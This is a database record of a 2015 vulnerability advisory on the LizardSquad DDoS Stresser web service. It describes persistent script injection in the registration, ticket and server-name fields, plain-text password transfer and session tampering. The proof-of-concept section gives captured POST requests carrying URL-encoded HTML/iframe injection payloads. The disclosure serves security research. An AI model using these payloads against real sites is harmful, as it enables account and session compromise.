{"href": "http://www.vulnerability-lab.com/get_content.php?id=1417", "sourceData": "Document Title:\r\n===============\r\nLizardSquad DDoS Stresser - Multiple Vulnerabilities\r\n\r\n\r\nReferences (Source):\r\n====================\r\nhttp://www.vulnerability-lab.com/get_content.php?id=1417\r\n\r\nhttp://magazine.vulnerability-db.com/?q=articles/2015/01/20/lizardsquad-ddos-stresser-multiple-vulnerabilities-revealed-takeover-ddos#\r\n\r\n\r\nRelease Date:\r\n=============\r\n2015-01-20\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1417\r\n\r\n\r\nCommon Vulnerability Scoring System:\r\n====================================\r\n8.9\r\n\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nThe product, called Lizard Stresser is a stress tester that might let you see how your own network stands up to DDoS attacks, \r\nlike the ones that interrupted the gaming networks for several days last week. DDoS attacks basically overload servers with \r\nmassive amounts of bogus requests.\r\n\r\n(Copy of the Homepage: https://lizardstresser.su/ )\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nThe Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official LizardSquad DDoS Stresser online-service web-application.\r\n\r\n\r\nVulnerability Disclosure Timeline:\r\n==================================\r\n2015-01-20:\tPublic Disclosure (Vulnerability Laboratory)\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nAffected Product(s):\r\n====================\r\nLizardSquad\r\nProduct: DDoS Stresser - Web Application (Online-Service) 2015 Q1\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nRemote\r\n\r\n\r\nSeverity Level:\r\n===============\r\nHigh\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nMultiple web vulnerabilities has been discovered in the official LizardSquad `Stresser DDoS Service` web-application.\r\n\r\n1.1\r\nThe 1st vulnerability is located in `username` value of the registration module. A user can register a script code as payload \r\nto the name values. The ddos web-service of the input on registration uses the wrong conditions to encode and parse. Thus allows \r\nto execute the injected script code in the `./ref` module of the service. The request method to inject is POST and the \r\nvulnerability is located on the application-side of the ddos stresser service. The main administrators are able to see the user \r\npasswords, by watching the logs of an compromised server you see that they can switch by login in through the registered user accounts. \r\nThis is possible because of plain transfered passwords in the ddos application. The known event can be used to prepare malicious code \r\nthat executes function in connection with application-side injected script codes. The vulnerable file to inject the code is the \r\nregister.php file. Another execution of the injected script code occurs in the main dashboard (left sidebar) were the username \r\nis getting visible.\r\n\r\nVulnerable Module(s):\r\n\t\t\t\t[+] Registration (./ref)\r\n\r\nVulnerable Parameter(s):\r\n\t\t\t\t[+] username\r\n\r\nAffected Module(s):\r\n\t\t\t\t[+] Dashboard (Username in Left Sidebar)\r\n\r\n\r\n1.2\r\nThe 2nd vulnerability is located in the Ticket Title & Ticket Content input fields of the `Tickets` (tickets) module. A fresh registered \r\nuser account is able to inject own malicious persistent script code to the ticket input fields to exploit a backend administrator account. \r\nAfter an attacker registers and inject own script code to the ticket system he is able to get the ip of the backend users or can compromise \r\nthe session data of moderators/administrators. The inject occurs in the `./tickets` module. The execution takes place locally in the listed \r\nopen ticket items of the backend. Remote attackers are also able to access other tickets and stored information by intercepting the session \r\nof the add Ticket POST method request.\r\n\r\nVulnerable Module(s):\r\n\t\t\t\t[+] Tickets (./tickets)\r\n\r\nVulnerable Parameter(s):\r\n\t\t\t\t[+] name (servername)\r\n\r\n1.3\r\nThe 3rd vulnerability is located in the target server `name` value. The attacker uses the device or servername to send malicious data to the \r\nddos application control panel. A remote attacker can change the server or device name value to a script code payload that executes in the \r\npanel (server target list). The service syncs the the device/server name value after the infection but also if the attacker syncs the \r\ndata manually. In case of usage macOS to attack it is possible to change the servername easily to a malicious script code payload that \r\naffects the ddos control panel.\r\n\r\nVulnerable Module(s):\r\n\t\t\t\t[+] server list\r\n\r\nVulnerable Parameter(s):\r\n\t\t\t\t[+] name (servername)\r\n\r\n1.4\r\nThe 4th vulnerability is located in the `dasboard > user settings > change password` module. The data in the POST method to change the own \r\naccount password is send in plain-text. Thus allows remote attackers and network administors to capture compromised accounts. The service can \r\nalso be observed by man-in-the-middle attacks in the local network.\r\n\r\nVulnerable Module(s):\r\n\t\t\t\t[+] dasboard > user settings > change password\r\n\r\n\r\n1.5\r\nThe 5th vulnerability is also located in the `dasboard > user settings > change password` module. The POST method request of the change function in the \r\nddos application can be intercepted by attackers to compromise the service. The remote attacker logs in as user and intercepts the session information by \r\nchanging to an existing user account. Successul exploitation of the session tampering issues results in account system compromise (administrators/customers).\r\n\r\nVulnerable Module(s):\r\n\t\t\t\t[+] dasboard > user settings > change password\r\n\r\nVulnerable Parameter(s):\r\n\t\t\t\t[+] id\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\n1.1\r\n--- PoC Session Logs [POST] (Injection) ---\r\nStatus: 200[OK]\r\nPOST http://lizardstresser.su/usercp Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr\u00f6\u00dfe des Inhalts[-1] Mime Type[text/html]\r\n Request Header:\r\n Host[lizardstresser.su]\r\n User-Agent[Mozilla/5.0 \r\n\r\n(Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]\r\n Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]\r\n Accept-Language[de,en-US;q=0.7,en;q=0.3]\r\n Accept-Encoding[gzip, deflate]\r\n Referer\r\n\r\n[http://lizardstresser.su/usercp]\r\n Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]\r\n Connection[keep-alive]\r\n POST-Daten:\r\n cpassword[chaos666]\r\n npassword[http%3A%2F\r\n\r\n%2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe]\r\n rpassword[http%3A%2F%2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe]\r\n updatePassBtn[Change+Stored+Data%21]\r\n Response Header:\r\n Date[Tue, 20 Jan 2015 \r\n\r\n10:29:21 GMT]\r\n Content-Type[text/html]\r\n Transfer-Encoding[chunked]\r\n Connection[keep-alive]\r\n Expires[Thu, 19 Nov 1981 08:52:00 GMT]\r\n Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]\r\n \r\n\r\nPragma[no-cache]\r\n Server[cloudflare-nginx]\r\n CF-RAY[1aba972a06dd15b3-FRA]\r\n Content-Encoding[gzip]\r\n-\r\nStatus: 302[Moved Temporarily]\r\nPOST https://lizardstresser.su/register.php \r\nLoad Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr\u00f6\u00dfe des Inhalts[-1] Mime Type[text/html]\r\n Request Header:\r\n Host[lizardstresser.su]\r\n User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]\r\n Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]\r\n Accept-Language[de,en-US;q=0.7,en;q=0.3]\r\n Accept-Encoding[gzip, deflate]\r\n Referer[https://lizardstresser.su/register.php]\r\n Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]\r\n Connection[keep-alive]\r\n POST-Daten:\r\n username[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E2]\r\n password[chaos666]\r\n rpassword[chaos666]\r\n email[research%40vulnerbaility-lab.com]\r\n ref[%2F]\r\n checkbox1[1]\r\n register[Register]\r\n Response Header:\r\n Server[cloudflare-nginx]\r\n Date[Tue, 20 Jan 2015 11:20:02 GMT]\r\n Content-Type[text/html]\r\n Expires[Thu, 19 Nov 1981 08:52:00 GMT]\r\n Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]\r\n Pragma[no-cache]\r\n Location[/purchase]\r\n CF-RAY[1abae168238f15b3-FRA]\r\n X-Firefox-Spdy[3.1]\r\n\r\n\r\nReference(s):\r\nhttp://lizardstresser.su/?r=imgsrcx2020iframesrca20iframe\r\nhttps://lizardstresser.su/register.php\r\n\r\n\r\n1.2\r\n--- PoC Session Logs [POST] (Injection) ---\r\nStatus: 200[OK]\r\nPOST http://lizardstresser.su/ajax/addticket.php \r\nLoad Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Gr\u00f6\u00dfe des Inhalts[-1] Mime Type[text/html]\r\n Request Header:\r\n Host[lizardstresser.su]\r\n User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]\r\nAccept[*/*]\r\n Accept-Language[de,en-US;q=0.7,en;q=0.3]\r\n Accept-Encoding[gzip, deflate]\r\n Content-Type[application/x-www-form-urlencoded; charset=UTF-8]\r\n X-Requested-With[XMLHttpRequest]\r\n Referer[http://lizardstresser.su/tickets]\r\n Content-Length[324]\r\n Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]\r\n Connection[keep-alive]\r\n Pragma[no-cache]\r\n Cache-Control[no-cache]\r\n POST-Daten:\r\n title2[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]\r\n code[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]\r\ncontent[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]\r\n hash[JMX02SbuIwklRiGPAVDgeOC5nTs41xFp]\r\n Response Header:\r\n Date[Tue, 20 Jan 2015 10:30:54 GMT]\r\n Content-Type[text/html]\r\nTransfer-Encoding[chunked]\r\n Connection[keep-alive]\r\n Expires[Thu, 19 Nov 1981 08:52:00 GMT]\r\n Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]\r\n Pragma[no-cache]\r\n Server[cloudflare-nginx]\r\n CF-RAY[1aba996d3d7115b3-FRA]\r\n Content-Encoding[gzip]\r\n\r\nReference(s):\r\nhttp://lizardstresser.su/ajax/addticket.php\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nVulnerability Laboratory [Research Team]\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed \r\nor implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable \r\nin any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab \r\nor its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for \r\nconsequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \r\npolicies, deface websites, hack into databases or trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com \t- www.vuln-lab.com\t\t\t \t\t- www.evolution-sec.com\r\nContact: admin@vulnerability-lab.com \t- research@vulnerability-lab.com \t \t\t- admin@evolution-sec.com\r\nSection: magazine.vulnerability-db.com\t- vulnerability-lab.com/contact.php\t\t \t- evolution-sec.com/contact\r\nSocial:\t twitter.com/#!/vuln_lab \t\t- facebook.com/VulnerabilityLab \t \t\t- youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php\t- vulnerability-lab.com/rss/rss_upcoming.php \t\t- vulnerability-lab.com/rss/rss_news.php\r\nPrograms: vulnerability-lab.com/submit.php \t- vulnerability-lab.com/list-of-bug-bounty-programs.php\t- vulnerability-lab.com/register/\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to \r\nelectronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by \r\nVulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website \r\nis trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact \r\n(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.\r\n\r\n\t\t\t\tCopyright \u00a9 2015 | Vulnerability Laboratory - [Evolution Security GmbH]\u2122\r\n\r\n\r\n\r\n", "bulletinFamily": "exploit", "modified": "2015-01-20T00:00:00", "title": "LizardSquad DDoS Stresser - Multiple Vulnerabilities", "cvss": {"vector": "NONE", "score": 0.0}, "cvelist": [], "description": "", "viewCount": 7, "published": "2015-01-20T00:00:00", "edition": 3, "id": "VULNERLAB:1417", "type": "vulnerlab", "lastseen": "2019-07-10T16:42:10", "reporter": "Vulnerability Laboratory [Research Team]", "enchantments": {"dependencies": {"references": [], "modified": "2019-07-10T16:42:10", "rev": 2}, "score": {"value": 0.1, "vector": "NONE", "modified": "2019-07-10T16:42:10", "rev": 2}, "vulnersScore": 0.1}, "references": [], "scheme": null}